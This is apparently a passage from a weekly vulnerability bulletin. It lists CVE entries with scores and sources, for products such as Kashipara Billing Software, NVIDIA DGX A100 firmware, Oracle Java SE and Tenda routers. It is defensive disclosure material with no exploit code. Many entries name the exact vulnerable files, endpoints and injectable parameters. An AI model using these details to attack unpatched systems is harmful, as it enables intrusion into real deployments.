kashipara -- billing_softwareA vulnerability has been found in Kashipara Billing Software 1.0 and classified as critical. This vulnerability affects unknown code of the file party_submit.php of the component HTTP POST Request Handler. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250600.2024-01-139.8CVE-2024-0495
cna@vuldb.com
kashipara -- billing_softwareA vulnerability was found in Kashipara Billing Software 1.0 and classified as critical. This issue affects some unknown processing of the file item_list_edit.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250601 was assigned to this vulnerability.2024-01-139.8CVE-2024-0496
cna@vuldb.com
lenovo -- vantageA privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker to bypass integrity checks and execute arbitrary code with elevated privileges.2024-01-197.8CVE-2023-6043
psirt@lenovo.com
linux -- kernelA use-after-free flaw was found in the Linux Kernel. When a disk is removed, bdi_unregister is called to stop further write-back and waits for associated delayed work to complete. However, wb_inode_writeback_end() may schedule bandwidth estimation work after this has completed, which can result in the timer attempting to access the recently freed bdi_writeback.2024-01-157.8CVE-2024-0562
secalert@redhat.com
linux -- kernelA memory leak flaw was found in the Linux kernel's io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system.2024-01-167.8CVE-2024-0582
secalert@redhat.com
linux -- kernelAn out-of-bounds memory write flaw was found in the Linux kernel's Transport Layer Security functionality in how a user calls the splice function with a kTLS socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.2024-01-177CVE-2024-0646
secalert@redhat.com
live555 -- live555A heap-use-after-free vulnerability was found in live555 version 2023.05.10 while handling the SETUP.2024-01-129.8CVE-2023-37117
cve@mitre.org
mergen_software -- quality_management_systemImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mergen Software Quality Management System allows SQL Injection. This issue affects Quality Management System: before v1.2.2024-01-189.8CVE-2023-5806
iletisim@usom.gov.tr
mintplex-labs -- anything-llmAnythingLLM is an application that turns any document, resource, or piece of content into context that any LLM can use as references during chatting. In versions prior to commit `08d33cfd8` an unauthenticated API route (file export) can allow an attacker to crash the server, resulting in a denial of service attack. The "data-export" endpoint is used to export files using the filename parameter as user input. The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. An attacker can trick the input filter mechanism into pointing to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. This issue has been addressed in commit `08d33cfd8`. Users are advised to upgrade. There are no known workarounds for this vulnerability.2024-01-197.5CVE-2024-22422
security-advisories@github.com
mongodb -- c_driverWhen calling bson_utf8_validate on some inputs a loop with an exit condition that cannot be reached may occur, i.e. an infinite loop. This issue affects All MongoDB C Driver versions prior to versions 1.25.0.2024-01-127.5CVE-2023-0437
cna@mongodb.com
montonio -- montonio_for_woocommerceServer-Side Request Forgery (SSRF) vulnerability in Montonio Montonio for WooCommerce, Wpopal Wpopal Core Features, AMO for WP - Membership Management ArcStone wp-amo, Long Watch Studio WooVirtualWallet - A virtual wallet for WooCommerce, Long Watch Studio WooVIP - Membership plugin for WordPress and WooCommerce, Long Watch Studio WooSupply - Suppliers, Supply Orders and Stock Management, Squidesma Theme Minifier, Paul Clark Styles styles, Designmodo Inc. WordPress Page Builder - Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Custom Login Admin Front-end CSS, Team Agence-Press CSS Adder By Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU. This issue affects Montonio for WooCommerce: from n/a through 6.0.1; Wpopal Core Features: from n/a through 1.5.8; ArcStone: from n/a through 4.6.6; WooVirtualWallet - A virtual wallet for WooCommerce: from n/a through 2.2.1; WooVIP - Membership plugin for WordPress and WooCommerce: from n/a through 1.4.4; WooSupply - Suppliers, Supply Orders and Stock Management: from n/a through 1.2.2; Theme Minifier: from n/a through 2.0; Styles: from n/a through 1.2.3; WordPress Page Builder - Qards: from n/a through 1.0.5; PHPFreeChat: from n/a through 0.2.8; Custom Login Admin Front-end CSS: from n/a through 1.4.1; CSS Adder By Agence-Press: from n/a through 1.5.0; Confirm Data: from n/a through 1.0.7; AMP Toolbox: from n/a through 2.1.1; Admin CSS MU: from n/a through 2.6.2024-01-198.2CVE-2022-40700
audit@patchstack.com
netfilter -- netfilterAn out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family); While creating a new netfilter table, lack of a safeguard against invalid nf_tables family (pf) values within `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access.2024-01-127.8CVE-2023-6040
security@ubuntu.com
netvision_information -- airpassNetVision Information airPASS has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.2024-01-157.5CVE-2023-48383
twcert@cert.org.tw
nextcloud -- security-advisoriesNextcloud Global Site Selector is a tool which allows you to run multiple small Nextcloud instances and redirect users to the right server. A problem in the password verification method allows an attacker to authenticate as another user. It is recommended that the Nextcloud Global Site Selector is upgraded to version 1.4.1, 2.1.2, 2.3.4 or 2.4.5. There are no known workarounds for this issue.2024-01-189.6CVE-2024-22212
security-advisories@github.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 BMC contains a vulnerability in the host KVM daemon, where an unauthenticated attacker may cause stack memory corruption by sending a specially crafted network packet. A successful exploit of this vulnerability may lead to arbitrary code execution, denial of service, information disclosure, and data tampering.2024-01-129.8CVE-2023-31024
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 baseboard management controller (BMC) contains a vulnerability in the host KVM daemon, where an unauthenticated attacker may cause a stack overflow by sending a specially crafted network packet. A successful exploit of this vulnerability may lead to arbitrary code execution, denial of service, information disclosure, and data tampering.2024-01-129.8CVE-2023-31029
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 BMC contains a vulnerability in the host KVM daemon, where an unauthenticated attacker may cause a stack overflow by sending a specially crafted network packet. A successful exploit of this vulnerability may lead to arbitrary code execution, denial of service, information disclosure, and data tampering.2024-01-129.8CVE-2023-31030
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 BMC contains a vulnerability where a user may cause a missing authentication issue for a critical function by an adjacent network. A successful exploit of this vulnerability may lead to escalation of privileges, code execution, denial of service, information disclosure, and data tampering.2024-01-128CVE-2023-31033
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 BMC contains a vulnerability where an attacker may cause an LDAP user injection. A successful exploit of this vulnerability may lead to information disclosure.2024-01-127.5CVE-2023-31025
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a heap-based buffer overflow by local access. A successful exploit of this vulnerability may lead to code execution, denial of service, information disclosure, and data tampering.2024-01-127.8CVE-2023-31031
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 SBIOS contains a vulnerability where a local attacker can cause input validation checks to be bypassed by causing an integer overflow. A successful exploit of this vulnerability may lead to denial of service, information disclosure, and data tampering.2024-01-127.8CVE-2023-31034
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 SBIOS contains a vulnerability where an attacker may cause an SMI callout vulnerability that could be used to execute arbitrary code at the SMM level. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, and information disclosure.2024-01-127.8CVE-2023-31035
psirt@nvidia.com
nvidia -- triton_inference_serverNVIDIA Triton Inference Server for Linux and Windows contains a vulnerability where, when it is launched with the non-default command line option --model-control explicit, an attacker may use the model load API to cause a relative path traversal. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.2024-01-128.8CVE-2023-31036
psirt@nvidia.com
online_faculty_clearance -- online_faculty_clearanceA vulnerability classified as critical has been found in code-projects Online Faculty Clearance 1.0. This affects an unknown part of the file delete_faculty.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250569 was assigned to this vulnerability.2024-01-129.8CVE-2024-0464
cna@vuldb.com
online_faculty_clearance_system -- online_faculty_clearance_systemA vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been classified as critical. Affected is an unknown function of the file deactivate.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250566 is the identifier assigned to this vulnerability.2024-01-129.8CVE-2024-0461
cna@vuldb.com
online_faculty_clearance_system -- online_faculty_clearance_systemA vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /production/designee_view_status.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250567.2024-01-129.8CVE-2024-0462
cna@vuldb.com
online_faculty_clearance_system -- online_faculty_clearance_systemA vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /production/admin_view_info.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250568.2024-01-129.8CVE-2024-0463
cna@vuldb.com
oracle -- enterprise_managerVulnerability in the Oracle Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Event Management). The supported version that is affected is 13.5.0.0. Easily exploitable vulnerability allows high privileged attacker with access to the physical communication segment attached to the hardware where the Oracle Enterprise Manager Base Platform executes to compromise Oracle Enterprise Manager Base Platform. While the vulnerability is in Oracle Enterprise Manager Base Platform, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Enterprise Manager Base Platform accessible data as well as unauthorized access to critical data or complete access to all Oracle Enterprise Manager Base Platform accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Enterprise Manager Base Platform. CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L).2024-01-168.3CVE-2024-20916
secalert_us@oracle.com
oracle_corporation -- audit_vault_and_database_firewallVulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Difficult to exploit vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Audit Vault and Database Firewall, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle Audit Vault and Database Firewall. CVSS 3.1 Base Score 7.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H).2024-01-167.6CVE-2024-20924
secalert_us@oracle.com
oracle_corporation -- financial_services_analytical_applications_infrastructureVulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.7, 8.0.8, 8.0.9, 8.1.0, 8.1.1 and 8.1.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. While the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Financial Services Analytical Applications Infrastructure accessible data as well as unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 7.4 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L).2024-01-167.4CVE-2023-21901
secalert_us@oracle.com
oracle_corporation -- java_se_jdk_and_jreVulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).2024-01-167.4CVE-2024-20918
secalert_us@oracle.com
oracle_corporation -- java_se_jdk_and_jreVulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 17.0.9; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).2024-01-167.5CVE-2024-20932
secalert_us@oracle.com
oracle_corporation -- java_se_jdk_and_jreVulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).2024-01-167.4CVE-2024-20952
secalert_us@oracle.com
oretnom23 -- budget_and_expense_tracker_systemBudget and Expense Tracker System v1.0 is vulnerable to SQL Injection via /expense_budget/admin/?page=reports/budget&date_start=2023-12-28&date_end=2024-01-167.2CVE-2024-22628
cve@mitre.org
oretnom23 -- house_rental_management_systemA vulnerability was found in SourceCodester House Rental Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file manage_user.php of the component Edit User. The manipulation of the argument id/name/username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250610 is the identifier assigned to this vulnerability.2024-01-137.2CVE-2024-0502
cna@vuldb.com
paxtechnology -- paydroidPAX Android based POS devices with PayDroid_8.1.0_Sagittarius_V11.1.50_20230614 or earlier can allow the execution of arbitrary commands with system account privilege by shell injection starting with a specific word. The attacker must have shell access to the device in order to exploit this vulnerability.2024-01-157.8CVE-2023-42136
cvd@cert.pl
paxtechnology -- paydroidPAX Android based POS devices with PayDroid_8.1.0_Sagittarius_V11.1.50_20230614 or earlier can allow for command execution with high privileges by using malicious symlinks. The attacker must have shell access to the device in order to exploit this vulnerability.2024-01-157.8CVE-2023-42137
cvd@cert.pl
paxtechnology -- paydroidThe PAX A920 device allows downgrading the bootloader due to a bug in its version check. The signature is correctly checked and only a bootloader signed by PAX can be used. The attacker must have physical USB access to the device in order to exploit this vulnerability.2024-01-157.6CVE-2023-4818
cvd@cert.pl
phpgurukul -- blood_bank_&_donor_management_systemA vulnerability has been found in Blood Bank & Donor Management 5.6 and classified as critical. This vulnerability affects unknown code of the file /admin/request-received-bydonar.php. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250564.2024-01-127.2CVE-2024-0459
cna@vuldb.com
phpgurukul -- company_visitor_management_systemA vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file search-visitor.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251377 was assigned to this vulnerability.2024-01-187.2CVE-2024-0651
cna@vuldb.com
pivotal -- cloud_foundry_deploymentCloud Foundry routing release versions from v0.163.0 to v0.283.0 are vulnerable to a DOS attack. An unauthenticated attacker can use this vulnerability to force route pruning and therefore degrade the service availability of the Cloud Foundry deployment.2024-01-127.5CVE-2023-34061
security@vmware.com
progress_software_corporation -- moveit_transferIn Progress MOVEit Transfer versions released before 2022.0.10 (14.0.10), 2022.1.11 (14.1.11), 2023.0.8 (15.0.8), 2023.1.3 (15.1.3), an input validation issue was discovered. An authenticated user can manipulate a parameter in an HTTPS transaction. The modified transaction could lead to computational errors within MOVEit Transfer and potentially result in a denial of service.2024-01-177.1CVE-2024-0396
security@progress.com
progress_software_corporation -- openedgeThis issue affects Progress Application Server (PAS) for OpenEdge in versions 11.7 prior to 11.7.18, 12.2 prior to 12.2.13, and innovation releases prior to 12.8.0. An attacker can formulate a request for a WEB transport that allows unintended file uploads to a server directory path on the system running PASOE. If the upload contains a payload that can further exploit the server or its network, the launch of a larger scale attack may be possible.2024-01-189.1CVE-2023-40051
security@progress.com
progress_software_corporation -- openedgeThis issue affects Progress Application Server (PAS) for OpenEdge in versions 11.7 prior to 11.7.18, 12.2 prior to 12.2.13, and innovation releases prior to 12.8.0. An attacker who can produce a malformed web request may cause the crash of a PASOE agent potentially disrupting the thread activities of many web application clients. Multiple of these DoS attacks could lead to the flooding of invalid requests as compared to the server's remaining ability to process valid requests.2024-01-187.5CVE-2023-40052
security@progress.com
pyload -- pyloadpyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.2024-01-189.6CVE-2024-22416
security-advisories@github.com
qstar -- archive_storage_managerQStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 was discovered to contain a DOM Based Reflected Cross Site Scripting (XSS) vulnerability within the component qnme-ajax?method=tree_level.2024-01-138.8CVE-2023-51063
cve@mitre.org
qstar -- archive_storage_managerAn authenticated remote code execution vulnerability in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows attackers to arbitrarily execute commands.2024-01-138.8CVE-2023-51066
cve@mitre.org
qstar -- archive_storage_managerIncorrect access control in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to obtain system backups and other sensitive information from the QStar Server.2024-01-137.5CVE-2023-51065
cve@mitre.org
qstar -- archive_storage_managerAn access control issue in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to arbitrarily adjust sensitive SMB settings on the QStar Server.2024-01-137.5CVE-2023-51070
cve@mitre.org
rogierlankhorst -- burst_statistics_privacy-friendly_analytics_for_wordpressThe Burst Statistics - Privacy-Friendly Analytics for WordPress plugin, version 1.5.3, is vulnerable to Post-Authenticated SQL Injection via multiple JSON parameters in the /wp-json/burst/v1/data/compare endpoint. Affected parameters include 'browser', 'device', 'page_id', 'page_url', 'platform', and 'referrer'. This vulnerability arises due to insufficient escaping of user-supplied parameters and the lack of adequate preparation in SQL queries. As a result, authenticated attackers with editor access or higher can append additional SQL queries into existing ones, potentially leading to unauthorized access to sensitive information from the database.2024-01-177.2CVE-2024-0405
security@wordfence.com
shopware -- shopwareShopware is an open headless commerce platform. The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the "aggregations" object. The 'name' field in this "aggregations" object is vulnerable to SQL injection and can be exploited using time-based SQL queries. This issue has been addressed and users are advised to update to Shopware 6.5.7.4. For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.2024-01-169.3CVE-2024-22406
security-advisories@github.com
shopware -- shopwareShopware is an open headless commerce platform. The implemented Flow Builder functionality in the Shopware application does not adequately validate the URL used when creating the "call webhook" action. This enables malicious users to perform web requests to internal hosts. This issue has been fixed in the Commercial Plugin release 6.5.7.4 or with the Security Plugin. For installations with Shopware 6.4 the Security plugin is recommended to be installed and up to date. For older versions of 6.4 and 6.5 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.2024-01-167.6CVE-2024-22408
security-advisories@github.com
skyworthdigital -- cm5100_firmwareThis vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to transmission of authentication credentials in plaintext over the network. A remote attacker could exploit this vulnerability by eavesdropping on the victim's network traffic to extract the username and password from the web interface (Login Page) of the vulnerable targeted system.2024-01-177.5CVE-2023-51740
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to transmission of authentication credentials in plaintext over the network. A remote attacker could exploit this vulnerability by eavesdropping on the victim's network traffic to extract the username and password from the web interface (Password Reset Page) of the vulnerable targeted system.2024-01-177.5CVE-2023-51741
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Add Downstream Frequency parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform a Denial of Service (DoS) attack on the targeted system.2024-01-177.5CVE-2023-51742
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Set Upstream Channel ID (UCID) parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform a Denial of Service (DoS) attack on the targeted system.2024-01-177.5CVE-2023-51743
vdisclose@cert-in.org.in
spider-themes -- eazydocsThe EazyDocs WordPress plugin before 2.3.6 does not have authorization and CSRF checks when handling documents and does not ensure that they are documents from the plugin, allowing unauthenticated users to delete arbitrary posts, as well as add and delete documents/sections.2024-01-157.5CVE-2023-6029
contact@wpscan.com
taokeyun -- taokeyunA vulnerability was found in Taokeyun up to 1.0.5. It has been classified as critical. Affected is the function login of the file application/index/controller/m/User.php of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250584.2024-01-137.3CVE-2024-0479
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
taokeyun -- taokeyun | A vulnerability was found in Taokeyun up to 1.0.5. It has been declared as critical. Affected by this vulnerability is the function index of the file application/index/controller/m/Drs.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250585 was assigned to this vulnerability. | 2024-01-13 | 7.3 | CVE-2024-0480 | cna@vuldb.com
tenda -- a15_firmware | A vulnerability was found in Tenda A15 15.13.07.13. It has been classified as critical. This affects an unknown part of the file /goform/setBlackRule of the component Web-based Management Interface. The manipulation of the argument deviceList leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250701 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 7.2 | CVE-2024-0531 | cna@vuldb.com
tenda -- a15_firmware | A vulnerability was found in Tenda A15 15.13.07.13. It has been declared as critical. This vulnerability affects unknown code of the file /goform/WifiExtraSet of the component Web-based Management Interface. The manipulation of the argument wpapsk_crypto2_4g leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250702 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 7.2 | CVE-2024-0532 | cna@vuldb.com
tenda -- a15_firmware | A vulnerability was found in Tenda A15 15.13.07.13. It has been rated as critical. This issue affects some unknown processing of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250703. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 7.2 | CVE-2024-0533 | cna@vuldb.com
tenda -- a15_firmware | A vulnerability classified as critical has been found in Tenda A15 15.13.07.13. Affected is an unknown function of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument mac leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250704. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 7.2 | CVE-2024-0534 | cna@vuldb.com
tenda -- pa6 | A vulnerability classified as critical was found in Tenda PA6 1.0.1.21. Affected by this vulnerability is the function cgiPortMapAdd of the file /portmap of the component httpd. The manipulation of the argument groupName leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250705 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 8.8 | CVE-2024-0535 | cna@vuldb.com
tenda -- w9_firmware | A vulnerability, which was classified as critical, has been found in Tenda W9 1.0.0.7(4456). Affected by this issue is the function setWrlAccessList of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250706 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 9.8 | CVE-2024-0536 | cna@vuldb.com
tenda -- w9_firmware | A vulnerability, which was classified as critical, was found in Tenda W9 1.0.0.7(4456). This affects the function setWrlBasicInfo of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250707. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 9.8 | CVE-2024-0537 | cna@vuldb.com
tenda -- w9_firmware | A vulnerability has been found in Tenda W9 1.0.0.7(4456) and classified as critical. This vulnerability affects the function formQosManage_auto of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250708. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 9.8 | CVE-2024-0538 | cna@vuldb.com
tenda -- w9_firmware | A vulnerability was found in Tenda W9 1.0.0.7(4456) and classified as critical. This issue affects the function formQosManage_user of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250709 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 9.8 | CVE-2024-0539 | cna@vuldb.com
tenda -- w9_firmware | A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been classified as critical. Affected is the function formOfflineSet of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250710 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 9.8 | CVE-2024-0540 | cna@vuldb.com
